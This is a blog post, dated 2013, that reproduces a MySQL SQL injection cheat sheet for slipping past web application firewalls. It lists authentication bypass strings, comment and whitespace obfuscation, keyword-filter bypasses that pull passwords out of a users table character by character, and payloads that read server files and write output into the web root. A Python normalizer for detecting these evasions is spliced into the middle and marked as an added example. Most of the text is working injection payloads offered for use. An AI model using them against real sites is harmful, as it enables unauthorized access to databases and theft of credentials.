Master SQL Cheat Sheet With WAF


SQLi filter evasion cheat sheet (MySQL)
Basic filter

Comments
'or 1=1#
'or 1=1-- -
'or 1=1/* (MySQL < 5.1)
'or 1=1;
'or 1=1 union select 1,2 as `
'or#newline
1='1
'or--newline
1='1
'/*!50000or*/1='1
'/*!or*/1='1

Prefixes
+ - ~ !
'or -+2=-!!!'2

Operators
^, =, !=, %, /, *, &, &&, |, ||, <, >, >>, <<, >=, <=, <>, <=>, XOR, DIV, LIKE, SOUNDS LIKE, RLIKE, REGEXP, LEAST, GREATEST, CAST, CONVERT, IS, IN, NOT, MATCH, AND, OR, BINARY, BETWEEN, ISNULL



Whitespaces
%20 %09 %0a %0b %0c %0d %a0 /**/
'or+(1)sounds/**/like"1"--%a0-
'union(select(1),table_name,(3)from`information_schema`.`tables`)#

Strings with quotes
SELECT 'a'
SELECT "a"
SELECT n'a'
SELECT b'1100001'
SELECT _binary'1100001'
SELECT x'61'

Strings without quotes
'abc' = 0x616263

Aliases
select pass as alias from users
select pass aliasalias from users
select pass `alias alias` from users

Typecasting
'or true='1 # or 1=1
'or round(pi(),1)+true+true=version() # or 3.1+1+1 = 5.1
'or '1 # or true

Compare operator typecasting
select * from users where 'a' = 'b' = 'c'
select * from users where ('a' = 'b') = 'c'
select * from users where (false) = 'c'
select * from users where (0) = 'c'
select * from users where (0) = 0
select * from users where true
select * from users

Authentication bypass '='
select * from users where name = '='
select * from users where false = ''
select * from users where 0 = 0
select * from users where true
select * from users

Authentication bypass '-'
select * from users where name = '-'
select * from users where name = 0-0
select * from users where 0 = 0
select * from users where true
select * from users
Function filter

General function filtering
ascii(97)
load_file/*foo*/(0x616263)

Strings with functions
'abc' = unhex(616263)
'abc' = char(97,98,99)
hex('a') = 61
ascii('a') = 97
ord('a') = 97
'ABC' = concat(conv(10,10,36),conv(11,10,36),conv(12,10,36))

Strings Extracted from gadgets
collation(\N) // binary
collation(user()) // utf8_general_ci
@@time_format // %H:%i:%s
@@binlog_format // MIXED
@@version_comment // MySQL Community Server (GPL)
dayname(from_days(401)) // Monday
dayname(from_days(403)) // Wednesday
monthname(from_days(690)) // November
monthname(from_unixtime(1)) // January
collation(convert((1)using/**/koi8r)) // koi8r_general_ci
(select(collation_name)from(information_schema.collations)where(id)=2) // latin2_czech_cs

Special characters Extracted from gadgets
aes_encrypt(1,12) // 4CH±{?"^c×HeEEa (binary output)
des_encrypt(1,2) // ,/iOk (binary output)
@@ft_boolean_syntax // + -><()~*:""&|
@@date_format // %Y-%m-%d
@@innodb_log_group_home_dir // .\

Integer representations
(results involving version() assume a 5.x server, as in the 3.1+1+1 = 5.1 example above)
false: 0
true: 1
true+true: 2
floor(pi()): 3
ceil(pi()): 4
floor(version()): 5
ceil(version()): 6
ceil(pi()+pi()): 7
floor(version()+pi()): 8
floor(pi()*pi()): 9
ceil(pi()*pi()): 10
concat(true,true): 11
ceil(pi()*pi())+true: 11
ceil(pi()+pi()+version()): 12
floor(pi()*pi()+pi()): 13
ceil(pi()*pi()+pi()): 14
ceil(pi()*pi()+version()): 15
floor(pi()*version()): 16
ceil(pi()*version()): 17
ceil(pi()*version())+true: 18
floor((pi()+pi())*pi()): 19
ceil((pi()+pi())*pi()): 20
ceil(ceil(pi())*version()): 21
concat(true+true,true): 21
ceil(pi()*ceil(pi()+pi())): 22
ceil((pi()+ceil(pi()))*pi()): 23
ceil(pi())*ceil(version()): 24
floor(pi()*(version()+pi())): 25
floor(version()*version()): 26
ceil(version()*version()): 27
ceil(pi()*pi()*pi()-pi()): 28
floor(pi()*pi()*floor(pi())): 29
ceil(pi()*pi()*floor(pi())): 30
concat(floor(pi()),false): 30
floor(pi()*pi()*pi()): 31
ceil(pi()*pi()*pi()): 32
ceil(pi()*pi()*pi())+true: 33
ceil(pow(pi(),pi())-pi()): 34
ceil(pi()*pi()*pi()+pi()): 35
floor(pow(pi(),pi())): 36

@@new: 0
@@log_bin: 1

!pi(): 0
!!pi(): 1
true-~true: 3
log(-cos(pi())): 0
-cos(pi()): 1
coercibility(user()): 3
coercibility(now()): 4

minute(now())
hour(now())
day(now())
week(now())
month(now())
year(now())
quarter(now())
year(@@timestamp)
crc32(true)

Extract substrings
substr('abc',1,1) = 'a'
substr('abc' from 1 for 1) = 'a'
substring('abc',1,1) = 'a'
substring('abc' from 1 for 1) = 'a'
mid('abc',1,1) = 'a'
mid('abc' from 1 for 1) = 'a'
lpad('abc',1,space(1)) = 'a'
rpad('abc',1,space(1)) = 'a'
left('abc',1) = 'a'
reverse(right(reverse('abc'),1)) = 'a'
insert(insert('abc',1,0,space(0)),2,222,space(0)) = 'a'
space(0) = trim(version() from (version()))

Search substrings
locate('a','abc')
position('a','abc')
position('a' IN 'abc')
instr('abc','a')
substring_index('ab','b',1)

Cut substrings
length(trim(leading 'a' FROM 'abc'))
length(replace('abc','a',''))

Compare strings
strcmp('a','a')
mod('a','a')
find_in_set('a','a')
field('a','a')
count(concat('a','a'))

String length
length()
bit_length()
char_length()
octet_length()
bit_count()

String case
ucase
lcase
lower
upper
password('a') != password('A')
old_password('a') != old_password('A')
md5('a') != md5('A')
sha('a') != sha('A')
aes_encrypt('a') != aes_encrypt('A')
des_encrypt('a') != des_encrypt('A')

Keyword filter

Connected keyword filtering
(0)union(select(table_name),column_name,...
0/**/union/*!50000select*/table_name`foo`/**/...
0%a0union%a0select%09group_concat(table_name)....
0'union all select all`table_name`foo from`information_schema`.`tables`
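The comment, whitespace and encoding tricks in the Comments, Whitespaces and Connected keyword filtering lists above all work the same way: a filter that matches the literal text "union select" never sees it, while MySQL does. The normalizer below (an added example, not part of the original cheat sheet) shows the WAF-side fix: canonicalize the value before keyword matching. Function names and the sample values are constructed for this illustration.

```python
import re
from urllib.parse import unquote

# Whitespace MySQL accepts between tokens (the %20 %09 %0a %0b %0c %0d %a0
# list above); %a0 decodes to \xa0 when the value is read as latin-1.
MYSQL_WS = r"[ \t\n\x0b\x0c\r\xa0]+"


def normalize_sqli(raw: str) -> str:
    """Canonicalize one parameter value before keyword matching.

    Each step undoes one evasion from the cheat sheet:
      1. URL-decode so %a0 / %09 become real whitespace.
      2. Unwrap /*!50000select*/ to ' select ': MySQL executes the body of
         a conditional comment, so dropping it would hide the keyword.
      3. Replace plain block comments (/**/, /*foo*/) with a space.
      4. Replace '#' and '-- ' line comments (up to the newline) with a
         space; the SQL after the newline still executes.
      5. Fold every whitespace variant into one space and lowercase.
    """
    s = unquote(raw, encoding="latin-1")
    s = re.sub(r"/\*!\d{0,5}(.*?)\*/", r" \1 ", s, flags=re.S)
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)
    s = re.sub(r"(?:#|--(?=\s|$))[^\n]*", " ", s)
    s = re.sub(MYSQL_WS, " ", s)
    return s.lower().strip()


# Word boundaries, not spaces: 'union(select' and 'union all select' both hit.
UNION_SELECT = re.compile(r"\bunion\b\W*(?:all\W+)?\bselect\b")


def looks_like_union_select(raw: str) -> bool:
    """True when the canonical form carries a UNION ... SELECT."""
    return UNION_SELECT.search(normalize_sqli(raw)) is not None


if __name__ == "__main__":
    # Constructed sample values taken from the evasion lists above.
    for value in (
        "0%a0union%a0select%09group_concat(table_name)",
        "0/**/union/*!50000select*/table_name`foo`/**/",
        "(0)union(select(table_name),column_name",
        "O'Reilly",
    ):
        print(looks_like_union_select(value), repr(normalize_sqli(value)))
```

Hex, char() and x'..' string encodings from the function-filter sections are a separate class and are not folded here; a real WAF engine adds decoders for those before matching.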

OR, AND
'||1='1
'&&1='1
'='
'-'

OR, AND, UNION
'and (select pass from users limit 1)='secret

OR, AND, UNION, LIMIT
'and (select pass from users where id=1)='a

OR, AND, UNION, LIMIT, WHERE
'and (select pass from users group by id having id=1)='a

OR, AND, UNION, LIMIT, WHERE, GROUP
'and length((select pass from users having substr(pass,1,1)='a'))

OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING
'and (select substr(group_concat(pass),1,1) from users)='a
'and substr((select max(pass) from users),1,1)='a
'and substr((select max(replace(pass,'lastpw','')) from users),1,1)='a

OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING, SELECT
'and substr(load_file('file'),locate('DocumentRoot',(load_file('file')))+length('DocumentRoot'),10)='a
'='' into outfile '/var/www/dump.txt

OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING, SELECT, FILE
'procedure analyse()#
'-if(name='Admin',1,0)#
'-if(if(name='Admin',1,0),if(substr(pass,1,1)='a',1,0),0)#

Control flow
case 'a' when 'a' then 1 [else 0] end
case when 'a'='a' then 1 [else 0] end
if('a'='a',1,0)
ifnull(nullif('a','a'),1)

Enjoy..
PROTOTYPE...

Author: Unknown ~ A blog that provides various kinds of information

The article Master SQL Cheat Sheet With WAF was published by Unknown on Friday, December 20, 2013.